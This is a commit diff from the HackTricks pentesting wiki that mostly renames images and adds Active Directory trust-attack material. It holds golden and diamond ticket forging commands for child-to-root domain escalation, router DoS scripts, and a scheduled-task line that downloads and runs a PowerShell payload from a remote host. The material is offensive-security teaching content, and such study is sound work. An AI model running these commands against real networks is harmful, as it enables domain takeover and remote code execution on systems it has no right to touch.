GitBook: [#3573] No subject
Before Width: | Height: | Size: 84 KiB |
Before Width: | Height: | Size: 143 KiB After Width: | Height: | Size: 84 KiB |
BIN
.gitbook/assets/image (1) (1) (2).png
Normal file
After Width: | Height: | Size: 143 KiB |
Before Width: | Height: | Size: 18 KiB After Width: | Height: | Size: 20 KiB |
BIN
.gitbook/assets/image (2) (6).png
Normal file
After Width: | Height: | Size: 142 KiB |
Before Width: | Height: | Size: 142 KiB After Width: | Height: | Size: 12 KiB |
BIN
.gitbook/assets/image (3) (4).png
Normal file
After Width: | Height: | Size: 143 KiB |
Before Width: | Height: | Size: 143 KiB After Width: | Height: | Size: 18 KiB |
Before Width: | Height: | Size: 80 KiB |
Before Width: | Height: | Size: 18 KiB After Width: | Height: | Size: 80 KiB |
Before Width: | Height: | Size: 490 KiB |
Before Width: | Height: | Size: 25 KiB After Width: | Height: | Size: 490 KiB |
BIN
.gitbook/assets/image (4) (4).png
Normal file
After Width: | Height: | Size: 110 KiB |
Before Width: | Height: | Size: 110 KiB After Width: | Height: | Size: 18 KiB |
Before Width: | Height: | Size: 4.5 KiB |
Before Width: | Height: | Size: 12 KiB After Width: | Height: | Size: 4.5 KiB |
Before Width: | Height: | Size: 20 KiB After Width: | Height: | Size: 25 KiB |
|
@ -177,7 +177,7 @@
|
||||||
* [DCSync](windows-hardening/active-directory-methodology/dcsync.md)
|
* [DCSync](windows-hardening/active-directory-methodology/dcsync.md)
|
||||||
* [Diamond Ticket](windows-hardening/active-directory-methodology/diamond-ticket.md)
|
* [Diamond Ticket](windows-hardening/active-directory-methodology/diamond-ticket.md)
|
||||||
* [DSRM Credentials](windows-hardening/active-directory-methodology/dsrm-credentials.md)
|
* [DSRM Credentials](windows-hardening/active-directory-methodology/dsrm-credentials.md)
|
||||||
* [External Forest Domain - OneWay (Inbound)](windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md)
|
* [External Forest Domain - OneWay (Inbound) or bidirectional](windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md)
|
||||||
* [External Forest Domain - One-Way (Outbound)](windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md)
|
* [External Forest Domain - One-Way (Outbound)](windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md)
|
||||||
* [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md)
|
* [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md)
|
||||||
* [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md)
|
* [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md)
|
||||||
|
|
|
@ -105,7 +105,7 @@ Thus, after establishing the neighborhood, we know about the existence of these
|
||||||
|
|
||||||
**I have found that generating and quickly sending out mass EIGRP hello packets overloads the router’s CPU, which in turn can open the door to a DoS attack.** I have developed a little [**helloflooding.py**](https://github.com/in9uz/EIGRPWN/blob/main/helloflooding.py) **** script, but it seems to me that the script lacks the speed of sending out the packets. **It’s caused by GIL**, which prevents the **sprayhello** function from running in multiple threads per second. **Eventually I’ll rewrite the script in C.**
|
**I have found that generating and quickly sending out mass EIGRP hello packets overloads the router’s CPU, which in turn can open the door to a DoS attack.** I have developed a little [**helloflooding.py**](https://github.com/in9uz/EIGRPWN/blob/main/helloflooding.py) **** script, but it seems to me that the script lacks the speed of sending out the packets. **It’s caused by GIL**, which prevents the **sprayhello** function from running in multiple threads per second. **Eventually I’ll rewrite the script in C.**
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (2) (6).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Arguments of the script:
|
Arguments of the script:
|
||||||
|
|
||||||
|
@ -173,7 +173,7 @@ Script arguments:
|
||||||
|
|
||||||
The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented [**routingtableoverflow.py**](https://github.com/in9uz/EIGRPWN/blob/main/routingtableoverflow.py) **script**
|
The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented [**routingtableoverflow.py**](https://github.com/in9uz/EIGRPWN/blob/main/routingtableoverflow.py) **script**
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (3) (4).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Script arguments
|
Script arguments
|
||||||
|
|
||||||
|
@ -187,7 +187,7 @@ in9uz@Inguz:~$ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --sr
|
||||||
|
|
||||||
After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of **RandIP()** in [**Scapy**](https://github.com/secdev/scapy).
|
After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of **RandIP()** in [**Scapy**](https://github.com/secdev/scapy).
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (4).png" alt=""><figcaption><p>Routing table overflows on GW1 router</p></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (4) (4).png" alt=""><figcaption><p>Routing table overflows on GW1 router</p></figcaption></figure>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption><p>Overloaded router CPU</p></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption><p>Overloaded router CPU</p></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -94,7 +94,7 @@ We need the `.bat` file, which will run when the application is deployed and exe
|
||||||
|
|
||||||
The next step is to choose `Install app from file` and upload the application.
|
The next step is to choose `Install app from file` and upload the application.
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (37).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat).
|
Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat).
|
||||||
|
|
||||||
|
|
|
@ -281,7 +281,7 @@ In this case the attacker **won't receive the response timeout until he has send
|
||||||
|
|
||||||
Amazon's Application Load Balancer (ALB) will **stream the data of the connection as needed**, but if it **receives** the **response** to the half request (the timeout) **before** receiving the **body**, it **won't send the body**, so a **Race Condition** must be exploited here:
|
Amazon's Application Load Balancer (ALB) will **stream the data of the connection as needed**, but if it **receives** the **response** to the half request (the timeout) **before** receiving the **body**, it **won't send the body**, so a **Race Condition** must be exploited here:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
There's an additional complication when it comes to **exploiting Apache behind ALB** - **both servers** have a default **timeout of 60 seconds**. This leaves an **extremely small time-window** to send the second part of the request. The RC attack was ultimately successful after 66 hours.
|
There's an additional complication when it comes to **exploiting Apache behind ALB** - **both servers** have a default **timeout of 60 seconds**. This leaves an **extremely small time-window** to send the second part of the request. The RC attack was ultimately successful after 66 hours.
|
||||||
|
|
||||||
|
|
|
@ -532,17 +532,20 @@ It's important to notice that **a trust can be 1 way or 2 ways**. In the 2 ways
|
||||||
|
|
||||||
If Domain A trusts Domain B, A is the trusting domain and B ins the trusted one. Moreover, in **Domain A**, this would be an **Outbound trust**; and in **Domain B**, this would be an **Inbound trust**.
|
If Domain A trusts Domain B, A is the trusting domain and B ins the trusted one. Moreover, in **Domain A**, this would be an **Outbound trust**; and in **Domain B**, this would be an **Inbound trust**.
|
||||||
|
|
||||||
A trust relationship can also be **transitive** (A trust B, B trust C, then A trust C) or **non-transitive**.
|
**Different trusting relationships**
|
||||||
|
|
||||||
**Different trusting relationships:**
|
* **Parent-Child** – part of the same forest – a child domain retains an implicit two-way transitive trust with its parent. This is probably the most common type of trust that you’ll encounter.
|
||||||
|
|
||||||
* **Parent/Child** – part of the same forest – a child domain retains an implicit two-way transitive trust with its parent. This is probably the most common type of trust that you’ll encounter.
|
|
||||||
* **Cross-link** – aka a “shortcut trust” between child domains to improve referral times. Normally referrals in a complex forest have to filter up to the forest root and then back down to the target domain, so for a geographically spread out scenario, cross-links can make sense to cut down on authentication times.
|
* **Cross-link** – aka a “shortcut trust” between child domains to improve referral times. Normally referrals in a complex forest have to filter up to the forest root and then back down to the target domain, so for a geographically spread out scenario, cross-links can make sense to cut down on authentication times.
|
||||||
* **External** – an implicitly non-transitive trust created between disparate domains. “[External trusts provide access to resources in a domain outside of the forest that is not already joined by a forest trust.](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx)” External trusts enforce SID filtering, a security protection covered later in this post.
|
* **External** – an implicitly non-transitive trust created between disparate domains. “[External trusts provide access to resources in a domain outside of the forest that is not already joined by a forest trust.](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx)” External trusts enforce SID filtering, a security protection covered later in this post.
|
||||||
* **Tree-root** – an implicit two-way transitive trust between the forest root domain and the new tree root you’re adding. I haven’t encountered tree-root trusts too often, but from the [Microsoft documentation](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx), they’re created when you create a new domain tree in a forest. These are intra-forest trusts, and they [preserve two-way transitivity](https://technet.microsoft.com/en-us/library/cc757352\(v=ws.10\).aspx) while allowing the tree to have a separate domain name (instead of child.parent.com).
|
* **Tree-root** – an implicit two-way transitive trust between the forest root domain and the new tree root you’re adding. I haven’t encountered tree-root trusts too often, but from the [Microsoft documentation](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx), they’re created when you create a new domain tree in a forest. These are intra-forest trusts, and they [preserve two-way transitivity](https://technet.microsoft.com/en-us/library/cc757352\(v=ws.10\).aspx) while allowing the tree to have a separate domain name (instead of child.parent.com).
|
||||||
* **Forest** – a transitive trust between one forest root domain and another forest root domain. Forest trusts also enforce SID filtering.
|
* **Forest** – a transitive trust between two forest root domain. Forest trusts also enforce SID filtering.
|
||||||
* **MIT** – a trust with a non-Windows [RFC4120-compliant](https://tools.ietf.org/html/rfc4120) Kerberos domain. I hope to dive more into MIT trusts in the future.
|
* **MIT** – a trust with a non-Windows [RFC4120-compliant](https://tools.ietf.org/html/rfc4120) Kerberos domain. I hope to dive more into MIT trusts in the future.
|
||||||
|
|
||||||
|
#### Other differences in **trusting relationships**
|
||||||
|
|
||||||
|
* A trust relationship can also be **transitive** (A trust B, B trust C, then A trust C) or **non-transitive**.
|
||||||
|
* A trust relationship can be set up as **bidirectional trust** (both trust each other) or as **one-way trust** (only one of them trust the other).
|
||||||
|
|
||||||
### Attack Path
|
### Attack Path
|
||||||
|
|
||||||
1. **Enumerate** the trusting relationships
|
1. **Enumerate** the trusting relationships
|
||||||
|
@ -599,7 +602,7 @@ It is possible to compromise the root domain in various ways. Examples:
|
||||||
* [Schema attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent)
|
* [Schema attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent)
|
||||||
* Exploit ADCS - Create/modify certificate template to allow authentication as any user (e.g. Enterprise Admins)
|
* Exploit ADCS - Create/modify certificate template to allow authentication as any user (e.g. Enterprise Admins)
|
||||||
|
|
||||||
### External Forest Domain - One-Way (Inbound)
|
### External Forest Domain - One-Way (Inbound) or bidirectional
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
Get-DomainTrust
|
Get-DomainTrust
|
||||||
|
|
|
@ -89,7 +89,7 @@ Sometimes when creating a trust relationship, a password must be typed in by the
|
||||||
|
|
||||||
The cleartext password can be used to perform regular authentication as the trust account, an alternative to requesting a TGT using the Kerberos secret key of the trust account. Here, querying root.local from ext.local for members of Domain Admins:
|
The cleartext password can be used to perform regular authentication as the trust account, an alternative to requesting a TGT using the Kerberos secret key of the trust account. Here, querying root.local from ext.local for members of Domain Admins:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (1) (1) (1) (2).png>)
|
![](<../../.gitbook/assets/image (1) (1) (1).png>)
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
|
|
@ -1,22 +1,18 @@
|
||||||
# External Forest Domain - OneWay (Inbound)
|
# External Forest Domain - OneWay (Inbound) or bidirectional
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
In this scenario an external domain is trusting you, so you can get some kind of access over it.
|
In this scenario an external domain is trusting you (or both are trusting each other), so you can get some kind of access over it.
|
||||||
|
|
||||||
## Enumeration
|
## Enumeration
|
||||||
|
|
||||||
|
@ -69,17 +65,25 @@ IsGroup : True
|
||||||
IsDomain : True
|
IsDomain : True
|
||||||
|
|
||||||
# You may also enumerate where foreign groups and/or users have been assigned
|
# You may also enumerate where foreign groups and/or users have been assigned
|
||||||
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
|
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
|
||||||
```
|
```
|
||||||
|
|
||||||
In the previous enumeration it was found that the user **`crossuser`** is inside the **`External Admins`** group who has **Admin access** inside the **DC of the external domain**.
|
In the previous enumeration it was found that the user **`crossuser`** is inside the **`External Admins`** group who has **Admin access** inside the **DC of the external domain**.
|
||||||
|
|
||||||
|
## Initial Access
|
||||||
|
|
||||||
|
If you **couldn't** find any **special** access of your user in the other domain, you can still go back to the AD Methodology and try to **privesc from an unprivileged user** (things like kerberoasting for example):
|
||||||
|
|
||||||
|
{% content-ref url="./" %}
|
||||||
|
[.](./)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## Impersonation
|
## Impersonation
|
||||||
|
|
||||||
### With signing key
|
### With signing key
|
||||||
|
|
||||||
{% hint style="warning" %}
|
{% hint style="warning" %}
|
||||||
As a reminder, you can get the signing key with 
|
As a reminder, you can get the signing key with
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
|
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
|
||||||
|
@ -119,14 +123,10 @@ Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /d
|
||||||
|
|
||||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
@ -104,7 +104,7 @@ netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP lo
|
||||||
|
|
||||||
Now establish the session, which will forward us to **the first server**.
|
Now establish the session, which will forward us to **the first server**.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
#### winrs.exe <a href="#winrsexe" id="winrsexe"></a>
|
#### winrs.exe <a href="#winrsexe" id="winrsexe"></a>
|
||||||
|
|
||||||
|
@ -116,7 +116,7 @@ winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname
|
||||||
|
|
||||||
Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_:
|
Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (41).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### OpenSSH <a href="#openssh" id="openssh"></a>
|
### OpenSSH <a href="#openssh" id="openssh"></a>
|
||||||
|
|
||||||
|
@ -136,11 +136,11 @@ Download the latest [OpenSSH Release zip from github](https://github.com/PowerSh
|
||||||
|
|
||||||
Uncompress the zip to where you’d like. Then, run the install script - `Install-sshd.ps1`
|
Uncompress the zip to where you’d like. Then, run the install script - `Install-sshd.ps1`
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (38).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Lastly, just add a firewall rule to **open port 22**. Verify the SSH services are installed, and start them. Both of these services will need to be running for SSH to work.
|
Lastly, just add a firewall rule to **open port 22**. Verify the SSH services are installed, and start them. Both of these services will need to be running for SSH to work.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you receive a `Connection reset` error, update permissions to allow **Everyone: Read & Execute** on the root OpenSSH directory.
|
If you receive a `Connection reset` error, update permissions to allow **Everyone: Read & Execute** on the root OpenSSH directory.
|
||||||
|
|
||||||
|
|
|
@ -30,14 +30,16 @@ Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSi
|
||||||
|
|
||||||
### Golden Ticket (Mimikatz) with KRBTGT-AES256
|
### Golden Ticket (Mimikatz) with KRBTGT-AES256
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
```bash
|
```bash
|
||||||
mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"
|
mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"
|
||||||
|
|
||||||
/user is the username to impersonate.
|
/user is the username to impersonate (could be anything)
|
||||||
/domain is the current domain.
|
/domain is the current domain.
|
||||||
/sid is the current domain SID.
|
/sid is the current domain SID.
|
||||||
/sids is the SID of the target group to add ourselves to.
|
/sids is the SID of the target group to add ourselves to.
|
||||||
/aes256 is the AES256 key of the current domain's krbtgt account.
|
/aes256 is the AES256 key of the current domain's krbtgt account.
|
||||||
|
--> You could also use /krbtgt:<HTML of krbtgt> instead of the "/aes256" option
|
||||||
/startoffset sets the start time of the ticket to 10 mins before the current time.
|
/startoffset sets the start time of the ticket to 10 mins before the current time.
|
||||||
/endin sets the expiry date for the ticket to 60 mins.
|
/endin sets the expiry date for the ticket to 60 mins.
|
||||||
/renewmax sets how long the ticket can be valid for if renewed.
|
/renewmax sets how long the ticket can be valid for if renewed.
|
||||||
|
@ -45,6 +47,7 @@ mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid
|
||||||
# The previous command will generate a file called ticket.kirbi
|
# The previous command will generate a file called ticket.kirbi
|
||||||
# Just loading you can perform a dcsync attack agains the domain
|
# Just loading you can perform a dcsync attack agains the domain
|
||||||
```
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
For more info about golden tickets check:
|
For more info about golden tickets check:
|
||||||
|
|
||||||
|
@ -54,10 +57,17 @@ For more info about golden tickets check:
|
||||||
|
|
||||||
### Diamond Ticket (Rubeus + KRBTGT-AES256)
|
### Diamond Ticket (Rubeus + KRBTGT-AES256)
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
```powershell
|
```powershell
|
||||||
# Use the /sids param
|
# Use the /sids param
|
||||||
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap
|
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap
|
||||||
|
|
||||||
|
# Or a ptt with a golden ticket
|
||||||
|
Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid> /sids:<parent_domain_sid>-519 /user:Administrator /ptt
|
||||||
|
|
||||||
|
# You can use "Administrator" as username or any other string
|
||||||
```
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
For more info about diamond tickets check:
|
For more info about diamond tickets check:
|
||||||
|
|
||||||
|
@ -65,21 +75,81 @@ For more info about diamond tickets check:
|
||||||
[diamond-ticket.md](diamond-ticket.md)
|
[diamond-ticket.md](diamond-ticket.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
```bash
|
```bash
|
||||||
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
|
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
|
||||||
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
|
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
|
||||||
ls \\mcorp-dc.moneycorp.local\c$
|
ls \\mcorp-dc.moneycorp.local\c$
|
||||||
```
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain:
|
Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
```bash
|
```bash
|
||||||
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
|
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
|
||||||
|
|
||||||
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
|
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
|
||||||
|
|
||||||
gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
|
gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
|
||||||
|
|
||||||
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
|
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
|
||||||
|
|
||||||
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
|
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
|
||||||
```
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
With the acquired permissions from the attack you can execute for example a DCSync attack in the new domain:
|
||||||
|
|
||||||
|
{% content-ref url="dcsync.md" %}
|
||||||
|
[dcsync.md](dcsync.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
### From linux
|
||||||
|
|
||||||
|
#### Manual with [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py)
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
# This is for an attack from child to root domain
|
||||||
|
# Get child domain SID
|
||||||
|
lookupsid.py <child_domain>/username@10.10.10.10 | grep "Domain SID"
|
||||||
|
# Get root domain SID
|
||||||
|
lookupsid.py <child_domain>/username@10.10.10.10 | grep -B20 "Enterprise Admins" | grep "Domain SID"
|
||||||
|
|
||||||
|
# Generate golden ticket
|
||||||
|
ticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_domain_sid> -extra-sid <root_domain_sid> Administrator
|
||||||
|
|
||||||
|
# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING
|
||||||
|
# JUST USE THE SAME USERNAME IN THE NEXT STEPS
|
||||||
|
|
||||||
|
# Load ticket
|
||||||
|
export KRB5CCNAME=hacker.ccache
|
||||||
|
|
||||||
|
# psexec in domain controller of root
|
||||||
|
psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.10.10.10
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
#### Automatic using [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py)
|
||||||
|
|
||||||
|
This is an Impacket script which will **automate escalating from child to parent domain**. The script needs:
|
||||||
|
|
||||||
|
* Target domain controller
|
||||||
|
* Creds for an admin user in the child domain
|
||||||
|
|
||||||
|
The flow is:
|
||||||
|
|
||||||
|
